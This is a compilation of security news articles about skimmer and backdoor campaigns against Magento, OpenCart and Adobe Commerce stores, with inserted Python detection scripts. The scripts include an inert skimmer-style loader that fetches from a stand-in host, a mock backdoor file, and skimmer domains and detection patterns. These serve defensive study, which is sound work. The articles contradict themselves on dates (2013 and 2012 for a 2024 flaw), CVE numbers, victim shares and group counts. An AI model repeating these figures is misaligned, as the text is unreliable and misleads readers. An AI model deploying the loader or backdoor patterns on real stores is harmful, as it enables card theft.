Security Alert as Malware Campaign Hits Widely Used E-commerce CMS



A newly discovered malware campaign poses a serious threat to thousands of online retailers worldwide by exploiting vulnerabilities in widely used content management systems. According to security researchers, the attack primarily targets platforms built on open-source e-commerce CMS frameworks such as Magento and WooCommerce, injecting malicious code to steal customer data, compromise checkout pages, and gain administrative control over backend systems.

Believed to be part of a wider cybercriminal operation, the malware silently harvests sensitive information such as payment details and login credentials without the user being notified. Several online storefronts have already suffered significant losses as a result of the campaign, and cybersecurity companies as well as digital commerce platforms have issued urgent advisories.

The attackers have been able to distribute the malware at an unprecedented scale by abusing outdated plugins, unpatched CMS instances, and misconfigured servers. Because e-commerce remains a lucrative target for financially motivated threat actors, the incident highlights the importance of merchants regularly updating their systems, monitoring for abnormal activity, and implementing security best practices.

The malware campaign signals an urgent need for immediate defence action, with consumer trust and financial transactions at risk. The following sections explain how the attack mechanics work, which platforms are affected, and what mitigations should be taken to prevent this from happening in the future. 

In the ever-evolving cybercrime landscape, e-commerce platforms have become prime targets, with recent studies indicating that 32.4% of successful cyberattacks are directed at online retailers and transaction-based companies. The e-commerce ecosystem faces a growing number of threats, and the interest of malicious actors grows with it, as they continually develop more sophisticated methods of exploiting vulnerabilities to gain an edge.

Store administrators, internal employees, and unsuspecting customers are all exposed to the growing range of threats facing the industry. Cybercriminals deploy a variety of attack vectors, including phishing, credit card fraud, fake checkout pages, malicious bots, and Distributed Denial of Service (DDoS) attacks, to disrupt operations, steal sensitive information, and undermine customer trust.

Businesses that fail to secure their systems adequately suffer not only immediate financial losses but also long-term reputational damage and legal consequences. Given that these incidents have never been more prevalent or more severe, it is of utmost importance that businesses take proactive and robust security measures.

Comprehensive malware removal and prevention solutions from cybersecurity companies such as Astra Security allow businesses to detect, neutralise, and recover from breaches of this nature. One of the most common ways attackers infiltrate e-commerce websites is by exploiting vulnerabilities in the platform itself, its infrastructure, or insecure third-party integrations.

Many breaches can be traced to an unfortunate combination of inadequate configuration management, outdated software, and weak security controls among external vendors. Popular platforms such as Magento present a logical target for cybercriminals, particularly where security patches are delayed or misconfigured.

In the past few years, cybercriminals have increasingly exploited known vulnerabilities (CVEs) in e-commerce platforms, with Adobe Magento attacked disproportionately compared to other platforms. A notable example is CVE-2024-20720, a critical command injection flaw discovered in early 2024 with a CVSS score of 9.1.

Exploiting this vulnerability allowed attackers to execute system commands remotely without any user interaction. Cybercriminal groups such as the notorious Magecart have used it to implant persistent backdoors and exfiltrate sensitive customer information.

There was also the CosmicSting campaign, which chained two vulnerabilities, CVE-2024-34215 and CVE-2024-2961, and affected more than 75% of Adobe Commerce and Magento installations worldwide. A malicious script injected through a CMS block or CMS block modification gave the attackers remote code execution, access to critical configuration files (including encryption keys), privilege escalation, and long-term control.

Given CosmicSting's widespread nature and sophistication, e-commerce platforms must take proactive measures to manage vulnerabilities and monitor threats in real time. Separately, a disturbing new wave of Magecart-style attacks is specifically targeting e-commerce websites built on the OpenCart content management system (CMS).

The stealthy and sophisticated execution methods used in this latest incident have drawn particular attention from cybersecurity experts. The attackers injected malicious JavaScript directly into landing pages, cleverly disguised as tags from legitimate third-party marketing and analytics providers such as Google Tag Manager and Meta Pixel.

By embedding malicious code within commonly used tracking snippets, attackers dramatically reduce the chance that traditional security tools detect them early. Analysts at c/side, a cybersecurity company that specialises in client-side threat monitoring, stated that the script used in this campaign was crafted to mimic the behaviour of a typical tag, but on closer examination it exhibited suspicious patterns.

A particularly deceptive aspect of this campaign is the use of Base64 encoding to obfuscate the payload URLs, which point to suspicious domains such as /tagscart.shop/cdn/analytics.min.js. The encoding conceals the script's true intent from inspection in transit, allowing it to blend into legitimate traffic flows undetected.

Once decoded, the script creates new HTML elements and inserts them into the document ahead of the existing scripts, quietly launching secondary malicious payloads in the background. The final stage consists of heavily obfuscated JavaScript intended to frustrate reverse engineering and bypass basic security filters.

It relies on techniques such as hexadecimal encoding, array manipulation, and dynamic execution via eval(). Real-time script monitoring and validation mechanisms are therefore essential to safeguard e-commerce infrastructures against increasingly sophisticated client-side attacks.
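One form the "script monitoring and validation" above can take, as an added example that is not c/side's tooling or code from the article: a static check of a page's script tags that flags external scripts whose host is off an allow-list and inline scripts combining several of the traits the analysis describes (Base64-encoded URL, hex escapes, eval(), injecting a new script element ahead of existing ones). The allow-list, the sample page and the inert lookalike loader (FAKE_URL) are constructed for the example; the tagscart.shop host is the one quoted in the article.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts this store legitimately loads tags from (constructed allow-list for the example).
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com", "connect.facebook.net"}
# Loader and final-stage traits described in the c/side analysis.
SUSPICIOUS = {
    "base64_decode": re.compile(r"\batob\s*\("),
    "dynamic_eval": re.compile(r"\beval\s*\("),
    "hex_escapes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){3,}"),
    "script_injection": re.compile(r"createElement\s*\(\s*['\"]script['\"]\s*\)"),
    "insert_before": re.compile(r"\.insertBefore\s*\("),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)
SRC_ATTR = re.compile(r"\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)

def decode_embedded_urls(js):
    """Return URLs hidden inside Base64 string literals of an inline script."""
    found = []
    for literal in B64_LITERAL.findall(js):
        try:
            text = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://", "//")):
            found.append(text)
    return found

def scan_html(html):
    """Flag external scripts off the allow-list and inline scripts showing 2+ traits."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname or ""
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append({"kind": "external_src", "host": host})
            continue
        hits = [name for name, rx in SUSPICIOUS.items() if rx.search(body)]
        urls = decode_embedded_urls(body)
        if urls:
            hits.append("base64_url")
        if len(hits) >= 2:  # one trait alone (e.g. insertBefore) is normal for genuine tags
            findings.append({"kind": "inline", "indicators": sorted(hits), "urls": urls})
    return findings

# Constructed sample page: the standard GTM loader, an inert lookalike built the way the
# article describes (Base64 URL, hex escapes, eval), plus one allowed and one unknown src.
FAKE_URL = "https://cdn.example-skimmer.invalid/analytics.min.js"
LEGIT_GTM = ("<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date()"
             ".getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s);"
             "j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;"
             "f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-XXXXXXX');</script>")
LOOKALIKE = ('<script>var k="\\x67\\x74\\x6d\\x2e";var u=atob("' + base64.b64encode(FAKE_URL.encode()).decode()
             + '");var s=document.createElement(\'script\');s.src=u;var f=document.getElementsByTagName'
             "('script')[0];f.parentNode.insertBefore(s,f);eval(k);</script>")
SAMPLE_HTML = ("<html><head>" + LEGIT_GTM + LOOKALIKE + '<script src="https://connect.facebook.net/en_US/fbevents.js">'
               '</script><script src="https://tagscart.shop/cdn/analytics.min.js"></script></head></html>')
```

Run against a crawled copy of each landing page on a schedule and diff the findings: a new unknown host or a newly flagged inline script is the signal the article says legitimate-looking tags otherwise hide.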

With the global reach of the internet, securing an e-commerce website has become a fundamental requirement for anyone who engages in online commerce. Whether through a personal website or a full-scale business, security is now an essential part of any online commerce process.

As malware campaigns targeting platforms such as Magento, WooCommerce, OpenCart, and others grow more complex, the cost of not acting can be devastating. Leaving a vulnerability unchecked or running an outdated plugin can result in credit card theft, customer data breaches, ransomware, or even complete loss of control of the site. For businesses, this means financial losses, reputational damage, legal liabilities, and the loss of customer trust; for individual entrepreneurs, it can mean the death of a growing business.

These threats can be mitigated through practical, proactive strategies: regular updates and patches, strong access controls, secure integration of third-party services, web application firewalls (WAFs), continuous malware scanning, and real-time monitoring tools. As the threat landscape evolves with each passing year, cybersecurity is not a one-time task but a continuous process.

As the e-commerce industry continues to grow around the world, the question is no longer whether a site, or a competitor's, will be targeted, but when. Investing in robust security measures today means more than protecting the business; it means being able to survive. Stay informed, stay current, and stay safe.

Magento Extension Supply Chain Attack Backdoors Hundreds of E-Commerce Sites

 

A coordinated supply chain attack has compromised between 500 and 1,000 Magento-based e-commerce websites through 21 backdoored extensions, according to new research from cybersecurity firm Sansec. The breach affected sites globally, including one operated by a multinational corporation valued at $40 billion.

Sansec revealed that malicious code was injected into the extensions as far back as 2019. However, it remained inactive until April 2025, when attackers remotely activated the malware and seized control of vulnerable servers. “Multiple vendors were hacked in a coordinated supply chain attack,” Sansec reported. “Curiously, the malware was injected six years ago, but came to life this week.” 

The compromised extensions originate from well-known Magento vendors Tigren, Meetanshi, and MGS. Affected extensions include:

Tigren: Ajaxsuite, Ajaxcart, Ajaxlogin, Ajaxcompare, Ajaxwishlist, MultiCOD

Meetanshi: ImageClean, CookieNotice, Flatshipping, FacebookChat, CurrencySwitcher, DeferJS

MGS: Lookbook, StoreLocator, Brand, GDPR, Portfolio, Popup, DeliveryTime, ProductTabs, Blog

Additionally, a version of the Weltpixel GoogleTagManager extension was found with similar code, though Sansec could not verify whether the source was the vendor or an already-infected site. The malware was embedded in files named License.php or LicenseApi.php, components that typically handle license validation for the extensions. The backdoor listens for HTTP requests containing special parameters such as requestKey and dataSign.

When these match hardcoded keys, the backdoor grants attackers admin-level functionality, including the ability to upload files. The uploaded files can then be executed through PHP's include_once() function, opening the door to data theft, credit card skimming, admin account creation, and complete server control. Earlier variants of the backdoor required no authentication at all.

However, recent versions now rely on a static key for limited protection. Sansec confirmed that this method was used to deploy a web shell on at least one client’s server. When alerted, vendor responses varied. MGS did not respond. Tigren denied any security breach and reportedly continues to distribute the compromised code. Meetanshi acknowledged a server intrusion but denied their extensions were affected. 

BleepingComputer independently verified the presence of the backdoor in the MGS StoreLocator extension, which is still available for download. Sansec recommends that any site using the listed extensions immediately conduct full server scans and review indicators of compromise. 
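A first pass at the server scan Sansec recommends, as an added example that is neither Sansec's tooling nor any vendor's code: it walks a Magento tree for License.php / LicenseApi.php files that read the requestKey or dataSign request parameters, write files, or include a variable path, the traits the article attributes to the backdoor. The temporary fixture tree, the ExampleVendor module and both file contents are constructed for the example (the flagged file is an inert stand-in, not the real backdoor).

```python
import os
import re
import tempfile

# File names and request parameters reported by Sansec; the include/upload patterns
# follow the article's description of how the backdoor executes uploaded files.
SUSPECT_FILES = {"License.php", "LicenseApi.php"}
PARAM_RX = re.compile(r"\$_(?:GET|POST|REQUEST)\s*\[\s*['\"](requestKey|dataSign)['\"]\s*\]")
INCLUDE_RX = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$")  # include of a variable path
UPLOAD_RX = re.compile(r"\b(?:move_uploaded_file|file_put_contents)\s*\(")

def inspect_file(path):
    """Return the indicators found in one PHP file (empty list if nothing matched)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            src = fh.read()
    except OSError:
        return []
    indicators = []
    params = sorted(set(PARAM_RX.findall(src)))
    if params:
        indicators.append("params:" + ",".join(params))
    if INCLUDE_RX.search(src):
        indicators.append("include_variable_path")
    if UPLOAD_RX.search(src):
        indicators.append("file_write")
    return indicators

def scan_extensions(root):
    """Walk a Magento tree (app/code and vendor) and report suspicious license files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in SUSPECT_FILES:
                continue
            path = os.path.join(dirpath, name)
            hits = inspect_file(path)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

def build_fixture():
    """Constructed Magento-like tree: one inert stand-in for the reported pattern, one clean file."""
    root = tempfile.mkdtemp()
    bad = os.path.join(root, "app", "code", "ExampleVendor", "Widget", "Helper")
    good = os.path.join(root, "vendor", "othervendor", "module", "Helper")
    os.makedirs(bad)
    os.makedirs(good)
    with open(os.path.join(bad, "License.php"), "w") as fh:
        fh.write("<?php\n// constructed sample, not real malware: mirrors the reported traits\n"
                 "$k = $_POST['requestKey']; $s = $_POST['dataSign'];\n"
                 "if ($k === 'static-key' && $s === 'static-sign') {\n"
                 "    file_put_contents($target, $_POST['data']);\n"
                 "    include_once($target);\n}\n")
    with open(os.path.join(good, "LicenseApi.php"), "w") as fh:
        fh.write("<?php\n// benign license check\nreturn ['valid' => true];\n")
    return root
```

A hit with both the parameters and a variable include is the pattern to treat as compromise; a license file matching only one indicator still deserves a manual read, since the article notes the vendors' own responses cannot be relied on.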

Ideally, websites should be restored from a verified, clean backup. The security firm also highlighted the unusual delay between the malware’s insertion and its activation, suggesting the attack was carefully planned over a long timeline. An expanded investigation is ongoing.

CosmicSting Exploit Targets Adobe Commerce and Magento Stores

 


In the summer of 2013, cybercriminals gained access to 5% of all Adobe Commerce and Magento stores worldwide. Large international brands are among the victims. The CosmicSting attack is being carried out by seven different groups that plant malicious code on their victims' systems.

A vulnerability dubbed CosmicSting (CVE-2024-34102) has been used against Magento and Adobe Commerce stores over the past two years, causing the stores to crash. Sansec's analysis of its data found that 3 to 5 stores are being hacked per hour. Merchants should implement the recommended countermeasures as soon as possible to avoid becoming victims themselves.

In recent months, CosmicSting attacks have affected a large number of Adobe Commerce and Magento websites, with about five of every ten online stores compromised. The CosmicSting vulnerability (CVE-2024-32102) is a critical information exposure flaw that can be exploited remotely and, when combined with another vulnerability in glibc (CVE-2024-2961), can lead to remote code execution.

The vulnerability is present in several Adobe Commerce, Magento Open Source, and Adobe Commerce Webhooks plugins. Web security firm Sansec reports that over 4,275 breaches have been reported since June 2024, affecting well-known brands such as Whirlpool and Ray-Ban, among others. Unpatched installations remain at risk, leaving a large number of stores extremely vulnerable to cyber-attacks.

According to an investigation by Sansec, seven financially motivated threat operations leveraged CosmicSting to exfiltrate Magento cryptographic keys and inject payment skimmers, infiltrating almost 5% of all Magento stores. These operations included Belki, Bobry, Burunduki, Khomyaki, Ondatry, and Surki. Whirlpool, Segway, and Ray-Ban are believed to have remediated the issue, and other companies have been urged to upgrade their Adobe Commerce and Magento installations as the attackers escalate their campaign.

Sansec predicts that more stores will be hacked in the coming months, as its report reveals that 75% of the Adobe Commerce and Magento install base had not been patched when automated scanning for secret encryption keys began in 2012. In the short period since the flaw was discovered it has become widely exploited, leading the U.S. Homeland Security Department (HSD) to add it to its list of Known Exploited Vulnerabilities (KEVs) in mid-July 2024, the fifth detection of the flaw since it was uncovered.

The attacks are weaponised by stealing Magento's secret encryption key, which can then be used to generate JSON Web Tokens (JWTs) with full access to the Magento administrative API. The threat actors have been observed using Magento's REST API to inject the malware.

Because the latest fix alone is not sufficient to protect against attacks using the latest exploit, site owners are advised to rotate their encryption keys as an ongoing security measure. CosmicSting advanced further in August 2024 with the addition of CNEXT (CVE-2024-2961), a vulnerability in the iconv library of the GNU C Library (glibc); by chaining the two vulnerabilities, attackers were able to achieve remote code execution.
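Why key rotation is the countermeasure that matters here, as an added example that is not Magento's token code or anything from Sansec: a simplified HS256 JWT model (the real Magento token format is not reproduced) shows that a token minted with a leaked signing key is accepted for as long as the server keeps that key, and is rejected the moment the key is rotated. Both keys are random stand-ins generated for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets

def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_jwt(payload: dict, key: bytes) -> str:
    """HS256 token: whoever holds `key` can mint one, which is why a leaked key is fatal."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url(sig)}"

def verify_jwt(token: str, key: bytes):
    """Return the payload if the signature is valid under `key`, otherwise None."""
    try:
        header, body, sig = token.split(".")
        if json.loads(_b64url_decode(header)).get("alg") != "HS256":  # reject 'none'/alg confusion
            return None
        expected = hmac.new(key, f"{header}.{body}".encode("ascii"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _b64url_decode(sig)):
            return None
        return json.loads(_b64url_decode(body))
    except (ValueError, UnicodeDecodeError):
        return None

def rotation_demo():
    """Model the article's point: a token minted with the leaked key stays valid until rotation."""
    leaked_key = secrets.token_bytes(32)            # stand-in for the store's leaked crypt key
    forged = sign_jwt({"uid": 1, "role": "admin"}, leaked_key)
    accepted_before = verify_jwt(forged, leaked_key) is not None   # server still uses the old key
    rotated_key = secrets.token_bytes(32)           # after rotation (and re-encrypting stored secrets)
    accepted_after = verify_jwt(forged, rotated_key) is not None
    return accepted_before, accepted_after
```

Patching closes the file-read hole; rotating the key is what invalidates tokens an attacker may already have minted, which is why the article treats the two as separate steps.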

Alongside CNEXT (CVE-2024-2961), the CVE-2024-34102 vulnerability allows arbitrary file reading on unpatched servers. Combined, they let threat actors escalate to remote code execution and compromise the entire system. Once in, the attackers aim to establish persistent, covert access to the server, facilitated by GSocket, and insert rogue scripts that allow third parties to execute arbitrary JavaScript to steal payment data entered by users on the site.

As Sansec had predicted, the announcement of CosmicSting came with few technical details and an urgent email warning to apply security updates as soon as possible, ushering in one of the biggest threats to the e-commerce ecosystem in recent years. According to the researchers, seven different threat groups use CosmicSting to compromise unpatched sites: Bobry, Polyovki, Surki, Burunduki, Ondatry, Khomyaki, and Belki. These groups are generally considered financially motivated opportunists who break into websites to steal credit card and customer information.

As of 2022, Ondatry used the "TrojanOrder" flaw but has since switched to CosmicSting, showing how some threat actors specialise in one area and keep looking for easily exploitable critical vulnerabilities to stay ahead of the curve. Some threat actors exploit CosmicSting to steal Magento cryptographic keys, retrieve payment and billing information from Magento checkout pages, and even fight each other for control of vulnerable Magento sites by injecting payment skimmers.

The groups inject malicious scripts into compromised sites from domains named to look like well-known JavaScript libraries or analytics services. The Burunduki group uses the domain 'jgueurystatic[.]xyz' to pose as jQuery, while the Polyovki threat actors use the cdnstatics.net domain to look like a website analytics script, as seen in the compromise of Ray-Ban's webpage.

The 2024 CosmicSting mass hack was made possible by a combination of unaware merchants and complicated mitigation steps that were not properly applied. Merchants can protect their online stores from attacks like CosmicSting through proactive server-side malware detection and vulnerability monitoring tools such as Sansec's eComscan.

These solutions provide continuous monitoring for potential threats and unauthorized activities, helping to safeguard eCommerce platforms. Sansec has confirmed that none of its clients have been impacted by the CosmicSting exploit, highlighting the effectiveness of these preventative measures. Despite this, Sansec has issued a warning that the number of compromised stores is likely to rise in the coming months. 

The company estimates that around 75% of Adobe Commerce and Magento installations were not updated with critical patches when automated scans for secret encryption keys began. This widespread lack of security patches leaves many stores vulnerable to future attacks.